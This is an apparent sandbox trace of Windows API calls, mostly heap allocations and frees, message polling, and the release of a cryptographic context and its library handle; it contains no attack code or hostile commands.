0x2e54ef8 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.182] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0187.182] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0187.182] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.182] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.183] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.183] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0187.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0187.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0187.220] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0187.220] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0187.220] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0187.220] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0187.221] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0187.221] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0187.221] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0187.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0187.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69b68, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.222] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0187.222] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0187.223] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0187.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0187.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0187.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0187.223] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0187.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0187.223] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0187.224] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0187.224] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.224] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0187.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0187.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0187.225] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0187.225] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0187.226] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0187.226] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0187.226] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0187.226] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0187.226] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0187.227] FreeLibrary (hLibModule=0x756e0000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0187.227] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0187.227] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.227] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0187.227] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.227] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0187.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0187.228] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0187.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0187.228] CloseHandle (hObject=0x2a0) returned 1 [0187.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0187.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0187.228] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0187.229] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0187.230] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50650 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0187.230] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0187.230] CloseHandle (hObject=0x2d0) returned 1 [0187.343] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0187.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0187.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0187.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0187.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0187.344] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 